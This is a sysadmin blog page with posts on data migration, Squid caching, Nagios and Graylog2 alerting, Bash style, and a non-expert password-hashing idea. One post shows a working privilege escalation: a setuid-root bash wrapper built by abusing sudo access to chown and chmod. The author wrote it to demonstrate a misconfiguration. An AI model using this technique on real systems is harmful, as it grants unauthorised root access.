Spanning files over multiple smaller devices

Imagine you are in Tasmania and need to move 35TB (1 million files) to S3 in the Sydney region. The link between Tasmania and continental Australia will undergo maintenance in the next month, which means one or both of the following:

  • You cannot use network links to transfer the data
  • Tasmania might be drifting further away from the mainland now that it is untethered

In short, I’m going to be presented with a bunch of HDs, and I need to copy the data onto them, fly to Sydney and upload it to S3. If I were given a single 35TB HD I could just copy the data and be done with it – no dramas. More likely though, the HDs will be smaller than 35TB, so I need to look at a few options for doing that.

Things to consider are:

  • Files should be present on the HDs in their original form – so they can be uploaded to S3 directly without needing a staging space for unzipping etc
  • HDs should be accessible independently – if an HD turns out to be faulty, I can easily identify which files need copying again
  • The copy operation should be reproducible, so the previous point can be satisfied if anything goes wrong in the copying process
  • Copying should be done in parallel (it’s 35TB, it’ll take a while)
  • It has to be simple to debug if things go wrong

LVM/ZFS over a few HDs

Building a larger volume over a few HDs requires me to connect all of them to a machine at the same time, and if any of them fails I will lose all the data. I decided not to do that – too risky. It’ll also be difficult to debug if anything goes wrong.

tar | split

Not a bad option on its own. An archive can be built and split into parts, and the parts can then be copied onto the destination HDs. But the loss of a single HD would render the remaining parts useless, as the archive could not be reassembled.
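
For the record, a minimal sketch of what that route would look like (the sizes, paths and part prefix are made up, and the parts would then still have to be distributed across the HDs):

# build the archive and split it into HD-sized chunks
tar -cf - /data/to/copy | split --bytes=3500G - backup.tar.part_

# getting anything back out later requires every single part, in order,
# plus a staging area to extract into
cat backup.tar.part_* | tar -xf - -C /some/staging/area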

tar also supports -L (tape length), so it could potentially split the backup on its own, without split. Still, it would take a very long time to spool it to multiple HDs, as it wouldn’t be able to do it in parallel, and I can’t say I’m super keen on relying on it – it has to work the first time. In addition, I’d have to improvise something for untarring and uploading to S3, as I will have no staging area to untar those 35TB. I’d need something along the lines of tar -O -xf ... | s3cmd.

Span Files

I decided to write a utility that’ll do what I need since there’s only one chance of getting it right – it’s called span-files.sh. It operates in three phases:

  • index – lists all files to be copied and their sizes
  • span – given a maximum size of a HD, iterate on the index and generate a list of files to be copied per HD
  • copy – produces rsync --files-from=list.X commands to run per HD. They can all be run in parallel if needed

The utility is available here:
https://github.com/danfruehauf/Scripts/tree/master/span-files
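
To illustrate the span phase, here is a minimal sketch of the greedy packing it boils down to, assuming an index file of size<TAB>path lines – this is a toy, not the real span-files.sh:

#!/bin/bash
# toy "span" phase: walk an index of "size<TAB>path" lines and start a
# new list whenever the current HD would overflow
max_size=$1      # maximum HD size, in bytes
index_file=$2    # produced by the index phase

hd=0
current=0
while IFS=$'\t' read -r size path; do
	if ((current + size > max_size)); then
		hd=$((hd + 1))
		current=0
	fi
	current=$((current + size))
	echo "$path" >> "list.$hd"
done < "$index_file"

Each resulting list.X then feeds one rsync --files-from=list.X run, one per destination HD, and those runs can happen in parallel.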

I’ll let you know how it all went after I do the actual copy. I still wonder whether I forgot some things…

Posted February 7, 2016 by malkodan in System Administration


Privilege Escalation – be slack and pay for it

My predecessor(s) had left a bunch of people at my workplace (not even developers) with sudo access to chown and chmod – for the purpose of data management. For a while I had tried to explain that having sudo access to just those two commands is effectively having full root access on the machines.
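
For context, the sudo setup was something along these lines (the file name and username are hypothetical; the whitelisted commands are the ones mentioned above):

# /etc/sudoers.d/data-management -- hypothetical reconstruction
datamgr ALL=(root) NOPASSWD: /bin/chown, /bin/chmod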

I had to demonstrate it. So I did:

cat <<EOF > make-me-root.c
#include <unistd.h>

int main() {
    /* once this binary is owned by root and has the setuid bit set,
     * it simply re-executes a shell as root */
    char *const args[] = { "/bin/bash", NULL };
    setuid(0);
    execv("/bin/bash", args);
    return 0;
}
EOF

gcc -o make-me-root make-me-root.c
sudo chown root make-me-root
sudo chmod u+s make-me-root

./make-me-root

Alright, demonstrated. Now it’s time for the raised eyebrows to follow.

And now also comes the part where I know it’s almost impossible to revoke privileges from people after they got used to a broken workflow.

Posted January 30, 2015 by malkodan in Linux


Apache, Squid, Tomcat

This is going to be a quick “grocery list” for getting an Apache -> Squid -> Tomcat configuration going, allowing multiple webapps to be cached at the same time.

The Common Case – Apache & Tomcat

Commonly, people have a configuration of Apache -> Tomcat serving web applications. However, sometimes you would like to add that extra bit of simple caching for a webapp. Sometimes it can really speed things up!!

Assuming you have Tomcat configured and serving a webapp on http://localhost:8080/webapp, and an Apache vhost which looks like this:

<VirtualHost *:80>
  ServerName www.webapp.com

  LogLevel info
  ErrorLog /var/log/apache2/www.webapp.com-error.log
  CustomLog /var/log/apache2/www.webapp.com-access.log combined

  ProxyPreserveHost On

  ProxyPass           /webapp http://localhost:8080/webapp
  ProxyPassReverse    /webapp http://localhost:8080/webapp

  RewriteEngine On
  RewriteOptions inherit
  RewriteLog /var/log/apache2/www.webapp.com-rewrite.log
  RewriteLogLevel 0

</VirtualHost>

Simple! Just forward all /webapp requests to http://localhost:8080/webapp

Squid In The Middle

A simple squid configuration for us would look like:

# some boilerplate configuration for squid
acl manager proto cache_object
acl localhost src 127.0.0.1/32
acl to_localhost dst 127.0.0.0/8 0.0.0.0/32
acl localnet src 10.0.0.0/8
acl localnet src 172.16.0.0/12
acl localnet src 192.168.0.0/16
acl Safe_ports port 80
acl Safe_ports port 443	
acl Safe_ports port 8080-8100 # webapps
acl purge method PURGE
acl CONNECT method CONNECT

http_access allow manager localhost
http_access deny manager
http_access allow purge localhost
http_access deny purge
http_access deny !Safe_ports
http_access allow localhost
http_access allow localnet
http_access deny all

icp_access allow localnet
icp_access deny all
http_port 3128

hierarchy_stoplist cgi-bin ?
access_log /var/log/squid/access.log squid
hosts_file /etc/hosts
coredump_dir /var/spool/squid3

# adjust your cache size!
cache_dir ufs /var/cache/squid 20480 16 256
cache_mem 5120 MB

#################################
# interesting part start here!! #
#################################
# adjust this to your liking
maximum_object_size 200 KB

# required to handle same URL with different parameters differently
# so for instance the two following URLs are treated as distinct URLs, hence they will
# be cached separately
# http://localhost:8080/webapp/a?param=1
# http://localhost:8080/webapp/a?param=2
strip_query_terms off

# just for some better logging
logformat combined %>a %ui %un [%tl] "%rm %ru HTTP/%rv" %>Hs %<st "%{Referer}>h" "%{User-Agent}>h" %Ss:%Sh

# refresh_pattern is subject to change, but if you decide to cache a webapp, you must make sure it actually gets cached!
# many webapps do not like to get cached, so you can play with all sorts of parameters such as override-expire, ignore-reload
# and ignore-no-cache. the following directive will SURELY cache any page on the following webapp for 1 hour (60 minutes)
# adjust the regexp(s) below to suit your own needs!!
refresh_pattern http://localhost:8080/webapp/.* 60 100% 60 override-expire ignore-reload ignore-no-cache

Now we need to plug Apache into the above squid configuration. Luckily it’s pretty simple; the only line you need is:

# basically every request going to http://localhost:8080/webapp, pass via squid
ProxyRemote http://localhost:8080/webapp http://localhost:3128

And the whole vhost again:

<VirtualHost *:80>
  ServerName www.webapp.com

  LogLevel info
  ErrorLog /var/log/apache2/www.webapp.com-error.log
  CustomLog /var/log/apache2/www.webapp.com-access.log combined

  ProxyPreserveHost On
  ProxyRemote http://localhost:8080/webapp http://localhost:3128

  ProxyPass           /webapp http://localhost:8080/webapp
  ProxyPassReverse    /webapp http://localhost:8080/webapp

  RewriteEngine On
  RewriteOptions inherit
  RewriteLog /var/log/apache2/www.webapp.com-rewrite.log
  RewriteLogLevel 0

</VirtualHost>

That’s it, now look at /var/log/squid/access.log and look for TCP_MEM_HIT and TCP_HIT. If you’re still getting TCP_MISS and the like, you’ll have to adjust your refresh_pattern in the squid configuration.

Multiple Webapps?

Not a problem. If you have multiple webapps and you want them cached, just add the magic ProxyRemote line passing each of them through squid, plus the relevant squid refresh_pattern, as shown below.
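
For example, caching a hypothetical second webapp (otherapp on port 8081 – both names made up) would just mean adding, in the vhost:

ProxyRemote         http://localhost:8081/otherapp http://localhost:3128
ProxyPass           /otherapp http://localhost:8081/otherapp
ProxyPassReverse    /otherapp http://localhost:8081/otherapp

And in the squid configuration:

refresh_pattern http://localhost:8081/otherapp/.* 60 100% 60 override-expire ignore-reload ignore-no-cache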

Don’t want a webapp to be cached? Just bypass the squid!

Posted April 27, 2014 by malkodan in Linux, System Administration


Ninja Merge

Recently I was presented with the following situation at work:

  • Your input is a handful of directories, filled with files, some of them being a “sort of a copy” of the others
  • Your output should be one directory with all the files from the source directories merged into it
  • The caveat is – if any of the files collide, you must mark them somehow for inspection

So that sounds pretty simple, doesn’t it? In my case the input was millions of files. I’m not sure about the exact number; it doesn’t matter. The best solution for this problem is to never get into this situation in the first place, however sometimes you just inherit stuff like that at a new workplace.

The Solution

We needed a ninja. I called it ninja-merge.sh. It is a Bash wrapper for rsync that will merge directories one by one into a destination directory and handle the collisions for you using a checksum function (md5 was “good enough” for that task).

Get ninja-merge.sh here:
https://github.com/danfruehauf/Scripts/tree/master/ninja-merge
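
To give a feel for the collision handling, here is a rough sketch of the idea – the real ninja-merge.sh wraps rsync and is more careful, so treat this as illustration only:

#!/bin/bash
# sketch: copy one source directory into a destination, parking any
# conflicting files, md5-suffixed, in a collision directory
merge_one() {
	local src=$1
	local dst=$2
	local collisions=$3
	local f
	while read -r f; do
		if [[ -f "$dst/$f" ]] && ! cmp -s "$src/$f" "$dst/$f"; then
			mkdir -p "$collisions/$(dirname "$f")"
			cp "$src/$f" "$collisions/$f.$(md5sum < "$src/$f" | cut -d' ' -f1)"
			cp "$dst/$f" "$collisions/$f.$(md5sum < "$dst/$f" | cut -d' ' -f1)"
		else
			mkdir -p "$dst/$(dirname "$f")"
			cp "$src/$f" "$dst/$f"
		fi
	done < <(cd "$src" && find . -type f)
}

# e.g. merge_one /srv/source1 /srv/merged /srv/collisions, once per source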

It even has unit tests and the works. All that you have to do is specify:

  • A list of source directories
  • A destination directory
  • A directory to store the collisions

If a path collided, you might end up with something like that in your collision directory:

$ cd collision_directory && find . -type f
./a/b/filename1.nc.345c3132699d7524cefe3a161859ebee
./a/b/filename1.nc.259974c1617b40d95c0d29a6dd7b207e

Sorting the collisions is something you’ll have to do manually. Sorry!

Stronger password hashing – an abstract idea

Full disclosure: I am by no means an expert in cryptography (math), and the following is just an idea I had after reading the article about how crackers make mincemeat of our passwords.

The Problem

Password hashes, strong as they may seem today, are becoming weaker every day. When I hear about numbers like 2 billion password hashes per second, I’m rather amazed. Technology has advanced. The thing is, today it may be 2 billion, but sooner rather than later it’ll be 10, 20, 100 or more – sooner than we expect. Inspired a bit by the Bitcoin nonces I had this idea, which may or may not be good; I’m not here to judge. As said, I’m not an expert in cryptography.

I feel rather humble after reading that article. I know that cryptography is not engineering but math. However, with my experience in the computing field, it seems like sometimes you need a touch of engineering to adapt things to the real world. I bet in cryptography courses at university no one really teaches you how to implement password crackers using GPUs, or do they?

Abstract

The problem today with password hashing is that we rely entirely on the strength of the hash. With that logic, SHA2048 > SHA1024 > SHA512 > SHA256 – you get the point. With the GPU technology found today, we can either keep scaling up our hashing algorithm, or we can simply come up with a method that involves “more work”. I want to introduce a method which might help to secure the storage of passwords.

Inspired by the Bitcoin proof of work, adding nonces every time to find new hashes, I thought about the following (abstract) algorithm to hash a password:

hash_password(plain_password, hashed_password, cpu_ticks_used)
  if (enough_cpu_ticks_used <= cpu_ticks_used)
    return hashed_password
  else
    return hash_password(
      plain_password,
      HASH(hashed_password + plain_password),
      cpu_ticks_used + cpu_ticks_used_for_hashing)

// Run with:
my_password = hash_password("P4ssw0rd", "", A_LARGE_ADJUSTED_NUMBER)

What I’m trying to do here is basically run a password through a hashing function enough times that the amount of work is satisfactory for us, given the CPU/GPU power available nowadays. As CPU/GPU power grows, enough_cpu_ticks_used should increase accordingly.
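
Just to make the idea concrete, here is a toy sketch in Bash – a fixed iteration count stands in for the CPU-tick condition, and sha256sum is simply the hash I picked for the sketch:

#!/bin/bash
# toy iterated-hashing sketch: feed the previous hash plus the plain
# password back into the hash function a large, tunable number of times
hash_password() {
	local plain=$1
	local iterations=$2
	local hashed="" i
	for ((i = 0; i < iterations; i++)); do
		hashed=$(printf '%s%s' "$hashed" "$plain" | sha256sum | cut -d' ' -f1)
	done
	echo "$hashed"
}

my_password=$(hash_password "P4ssw0rd" 500000)

(And yes, spawning sha256sum in a loop is itself painfully slow – which is sort of the point.)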

Verifying Passwords

That’s the rather tricky part. As said before, this is just food for thought. When verifying a password, exactly the same work has to be done: if you have passwords of different strengths (different cpu_ticks_used values), verification has to invest just as much time until it reproduces the stored hash, which obviously increases the load on machines implementing this scheme.

Problems

Probably many!!

Things I can’t answer:

  • Can running SHA/MD5 over and over weaken the final hash?
  • If the client has to authenticate (calculate the hash), how deep a hash does it need to calculate?
  • If a stored password is “too weak” for the current day, you cannot rebuild it, as you need the plain part – what do you do then?
  • No idea – help me list more limitations, or perhaps disprove all of this?

At the end of the day it wouldn’t protect us from the most simple and stupid password breaches, such as dictionary attacks, but what it does counter is the crackers’ ability to run a gazillion hashes per second against a compromised password database.

I don’t come with all the answers; this is just something I’ve had in the back of my head for a while and wanted to share. Feel free to bash me if it is a stupid idea.

Posted July 1, 2013 by malkodan in System Administration


Bloody Hell, Indent Your Scripts!!!

Every so often I come across Bash scripts which are written as if Bash is a pile of rubbish and you just have to mould something ugly with it.

True, Bash is supposedly not the most “powerful” scripting language out there, but on the other hand, if you’re using traditional methods you can avoid installing a gazillion Ruby gems or Perl/Python modules (probably not even packaged as RPM or DEB!!) just to configure your system. Bash is simple and can be elegant. But that’s not the point.

The point is that too often Bash scripts which people write have zero maintainability and readability. Why is that??

I’m not going to point at any bad examples because that’s not a very nice thing to do, although I could, and easily.

Please do follow these three simple guidelines and you’ll get 90% of the job done in terms of maintainability and readability:

  • Functions – Write code in functions. Break your code into manageable pieces, like any other programming language, ey?
  • Avoid global variables – Global variables just make it all too complicated to follow what’s going on where. Sometimes they are needed but you can minimize the use of them.
  • INDENTATION – INDENT YOUR BLOODY CODE. If you have an if or for or what not, please just indent the block under it. It’s that simple and makes your code so much more readable.
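
A contrived example of what those three points look like in practice (made up for illustration, not taken from any real script):

#!/bin/bash
# count how many of the given services are running:
# a function, no globals leaking out, and indented blocks
count_running() {
	local service
	local running=0
	for service in "$@"; do
		if pgrep -x "$service" >/dev/null 2>&1; then
			running=$((running + 1))
		fi
	done
	echo "$running"
}

count_running sshd crond nginx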

That was my daily rant.

My Bash coding (or scripting) conventions cover a bit more and can be found here:
https://github.com/danfruehauf/Scripts/tree/master/bash_scripting_conventions

Fault Tolerant Nagios Cluster

I’ve been searching for a while for a solution of “how to build a fault tolerant Nagios installation” or “how to build a Nagios cluster”. Nada.
The concept is very simple, but it seems like the implementation lacks a bit, so I’ve decided to write a post about how I am doing it.

Cross Site Monitoring

The concept of cross site monitoring is very simple. Say you have nagios01 and nagios02; all you have to set up is two checks:

  • nagios01 monitors nagios02
  • nagios02 monitors nagios01
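
In nagios terms each of those two checks is just an ordinary service definition. A sketch of what it could look like on nagios01 (I am assuming a check_nrpe command and a check_nagios NRPE check, as used later in this post – adjust to whatever you already have):

# on nagios01: alert if the nagios process on nagios02 is not running
define service {
        service_description     nagios-process-on-nagios02
        host_name               nagios02
        use                     generic-service
        check_command           check_nrpe!check_nagios
}

The mirror image of it goes on nagios02, pointing back at nagios01.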

Assuming you have puppet or chef managing the show, just make nagios01 and nagios02 (or even more nagiosXX servers) identical, meaning all of them have the same configuration and can monitor all of your systems – clones of each other, if you like.
Let’s check the common use cases:

  • If nagios01 goes down you get an alert from nagios02.
  • If nagios02 goes down you get an alert from nagios01.

Great, I didn’t reinvent the wheel here.
The main problem with this configuration is that if there is a problem (any problem) you are going to get X alerts, X being the number of nagios servers you have.

Avoiding Duplicate Alerts

For the sake of simplicity, we’ll assume again we have just 2 nagios servers, but this would obviously scale for more.
What we actually want to do is prevent both servers from sending duplicate alerts as they are both configured the same way and will monitor the exact same thing.
One solution is obviously an active/passive type of cluster and all sorts of complicated shenanigans; my solution is simpler than that.
We’ll “chain” nagios02 behind nagios01, making nagios02 fire alerts only if nagios01 is down.
Log in to nagios02 and edit /etc/nagios/private/resource.cfg, adding the line:

$USER2$="/usr/lib64/nagios/plugins/check_nrpe -H nagios01 -c check_nagios"

$USER2$ will be the condition that tells us whether or not nagios is up on nagios01.

Still on nagios02, edit /etc/nagios/objects/commands.cfg, replacing your current alerting command with one that depends on the condition. Here is an example for the default one:

define command{
        command_name    notify-host-by-email
        command_line    /usr/bin/printf "%b" ...
}

Change to:

define command{
        command_name    notify-host-by-email
        command_line    eval $USER2$ || /usr/bin/printf "%b" ...
}

What we have done here is simply configure nagios02 to query nagios01’s nagios status before firing an alert. Easy as. No more duplicated emails.

For the sake of robustness, if you would also like to configure nagios01 with a $USER2$ variable, simply log in to nagios01, change the alerting command as on nagios02, and put this in /etc/nagios/private/resource.cfg:

$USER2$="/bin/false"

Assuming you have puppet or chef configuring all that, you can just assign a master ($USER2$=/bin/false) and multiple slaves that query each other in a chain.
For example:

  • nagios01 – $USER2$="/bin/false"
  • nagios02 – $USER2$="/usr/lib64/nagios/plugins/check_nrpe -H nagios01 -c check_nagios"
  • nagios03 – $USER2$="/usr/lib64/nagios/plugins/check_nrpe -H nagios01 -c check_nagios && /usr/lib64/nagios/plugins/check_nrpe -H nagios02 -c check_nagios"

Enjoy!

Graylog2 and Nagios Integration

Say you have a Nagios installation already monitoring everything, and in addition to that you have a Graylog2 installation which parses logs from everywhere and provides you with invaluable feedback on what’s really going on in your system.
And then comes the problem, or one of them:

  • Graylog2 is not really good at sending alerts (or maybe it is?)
  • Nagios is already configured to send alerts, and you would like to use the same contact groups, for instance

The solution is below.

Design

Before making you read through the whole blog entry, I’ll just outline the solution I’ve chosen to implement and you can decide whether it’s good for you or not. Here it is in a nutshell:

  • An alert is generated in Graylog2 in a configured stream
  • Graylog2 uses the exec callback plugin to call an external alerting command – call it graylog2-alert.sh for instance
  • graylog2-alert.sh pushes an alert using send_nsca
  • Nagios parses the alert and notifies whoever is subscribed to that service

Pretty simple and bulletproof.

Graylog2 Configuration

I assume you already have Graylog2 fully configured. In this case, download the wonderful exec callback plugin and place it under the plugin/alarm_callbacks directory (under the Graylog2 directory, obviously).

Log in to Graylog2 and, under Settings->System, enable the Exec alarm callback.

Click configure and point it to /usr/local/sbin/graylog2-alert.sh

That’s it for now on the Graylog2 interface side.

NSCA – Nagios Service Check Acceptor

Properly configure NSCA to work with your nagios installation. That usually means:

  • Opening port 5667 (or another port) on your nagios server
  • Choosing a password for symmetrical encryption on the nagios server and the NSCA clients
  • Starting the nsca daemon on the nagios server, so it will accept NSCA communications
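
The shared-secret part of that boils down to matching these two files (the values here are examples only):

# /etc/nagios/nsca.cfg on the nagios server
password=SOME_SHARED_SECRET
decryption_method=3

# /etc/nagios/send_nsca.cfg on the sending hosts (the Graylog2 box here)
password=SOME_SHARED_SECRET
encryption_method=3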

Generally speaking configuring NSCA is out of the scope of this article and more information can be found here:
http://www.nsclient.org/nscp/wiki/doc/usage/nagios/nsca

That said, I’ll just mention that when everything works, you should be able to run successfully:

echo "HOSTNAME;SERVICE;2;Critical" | send_nsca -d ';' -H NAGIOS_HOSTNAME

graylog2-alert.sh

On the Graylog2 host, place the following file under /usr/local/sbin/graylog2-alert.sh:

#!/bin/bash

# nagios servers to notify
NAGIOS_SERVERS="NAGIOS_SERVER_1 NAGIOS_SERVER_2 NAGIOS_SERVER_3"
# add a link to the nagios message, so it's easy to access the interface
# on your mobile device once you get an alert
GL2_LINK="http://GRAYLOG_URL/streams"

main() {
	local tmp_file=`mktemp`
	local gl2_topic=`echo $GL2_TOPIC | cut -d'[' -f2 | cut -d']' -f1`
	echo `hostname`";Graylog2-$gl2_topic;2;$GL2_LINK $GL2_DESCRIPTION" > $tmp_file
	local nagios_server
	for nagios_server in $NAGIOS_SERVERS; do
		/usr/sbin/send_nsca -d ';' -H $nagios_server < $tmp_file
	done
	rm -f $tmp_file
}

main "$@"

This, in combination with what we did before, will fire alerts from Graylog2 -> exec callback plugin -> graylog2-alert.sh -> NSCA -> nagios server.

The nagios side

All that is left to do now is define services for the Graylog2 alerts. It is a rather straightforward service configuration for nagios; here is mine (generated by puppet, in case you wonder):

define service {
        service_description            Graylog2-STREAM_NAME
        host                           REPLACE_WITH_YOUR_GRAYLOG2_HOST
        use                            generic-service
        contact_groups                 Graylog2-STREAM_NAME
        passive_checks_enabled         1
        max_check_attempts             1
        # enable active checks only to reset the alarm
        active_checks_enabled          1
        check_command                  check_tcp!22
        normal_check_interval          10
        notification_interval          10
        # set the contact group
        contact_groups                 Graylog2-STREAM_NAME
        flap_detection_enabled         0
}

define contactgroup{
        contactgroup_name       Graylog2-STREAM_NAME
        alias                   Graylog2-STREAM_NAME
        members                 dan
}

We usually have a contact group per Graylog2 stream. We just associate developers with the topic that’s relevant to them.

Restart your nagios and you’re set. Don’t forget to also start nsca!!

Resetting the alert

Graylog2 and NSCA will never generate “positive” OK alerts, only critical ones, so you need a mechanism to reset the alert every once in a while. If you scroll up you will see that I check port 22 (SSH) on the Graylog2 host.
How often, you ask?
When configuring a new stream in Graylog2, it is best to match the Grace period in Graylog2 to the normal_check_interval in nagios, which guarantees the alert is reset before a new one comes in.

Puppet

The whole shenanigan is obviously puppetized in our environment. Tailoring nagios to an environment varies a lot between environments, so I decided it would be rather redundant to paste the puppet recipes here.

I hope you can find this semi-tutorial helpful.

Posted May 26, 2013 by malkodan in Bash, Linux, System Administration


Hebrew Keyboard Layout In Linux

Since I got this question from way too many people, I wanted to just share my “cross distribution” and “cross desktop environment” way of doing that very simple thing of enabling a Hebrew keyboard layout under Linux.

Easy As

After logging into your desktop environment, type this:

setxkbmap -option grp:switch,grp:alt_shift_toggle,grp_led:scroll us,il

Alt+Shift will toggle between Hebrew and English. Easy as.

Sustainability

Making it permanent is just as easy:

mkdir -p ~/.config/autostart && cat <<EOF > ~/.config/autostart/hebrew.desktop
[Desktop Entry]
Type=Application
Encoding=UTF-8
Name=Hebrew
Comment=Enable a Hebrew keyboard layout
Exec=setxkbmap -option grp:switch,grp:alt_shift_toggle,grp_led:scroll us,il
EOF

This should survive logout/login, reboots, reinstalls (as long as you keep /home on a separate partition), distribution changes and switching to a different desktop environment (KDE, GNOME, LXDE, etc.).

Posted May 3, 2013 by malkodan in Bash, Linux


Handling many files in one directory

The Assignment

You have a directory with gazillion files. Since most filesystems are not very efficient with many files in one directory, it is advisable to spread them among a hierarchy of directories. Write a program (or script) which handles a directory with many files and spreads them in an efficient hierarchy.

Does that sound like a university assignment or something? Yes, it does.

Well, apparently such a situation just happened to me in real life. Searching across the internet I couldn’t find anything too useful – and I will stand corrected if there is something which already deals with this problem; post a comment if so.

And yes, thank god I’m using Unix (Linux); I don’t even want to think what one would do on Windows.

The Situation

An application was spooling many files to the same directory, generating up to a million files in a single directory. I’m sorry I cannot disclose any more information about it, but let’s just say it is a well known open source application.
Access to these files was still fast, thanks to ext4 and dir_index, but the directory index was too big to actually list files or do anything else without clogging up the whole system. And we need these files.

So we’ve decided to model the files in a way that’ll be more efficient for browsing and we can then handle it from there.

The Solution

After implementing something quick and dirty to mitigate the immediate pain, I sat down and wrote something a bit more generic. I’m happy to introduce the spread_files.sh utility.
What it takes care of:

  • Reading the directory index just once
  • Hierarchy depth as parameter
  • Stacking up to X files per mv command
  • Has recursion in Bash!!
Obviously the best solution would be to never get into that situation in the first place, but if you do, feel free to use spread_files.sh.
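
Here is a rough sketch of the idea behind it – not the real spread_files.sh (which reads the index once and batches its mv calls), just the gist of spreading a flat directory into a hierarchy derived from an md5 of each filename:

#!/bin/bash
# sketch: spread files from one flat directory into a two-level hierarchy,
# e.g. foo.log -> ab/cd/foo.log, based on the md5 of the filename
src_dir=$1
dst_dir=$2

find "$src_dir" -maxdepth 1 -type f -printf '%f\n' | while read -r name; do
	hash=$(printf '%s' "$name" | md5sum)
	bucket="$dst_dir/${hash:0:2}/${hash:2:2}"
	mkdir -p "$bucket"
	mv "$src_dir/$name" "$bucket/"
done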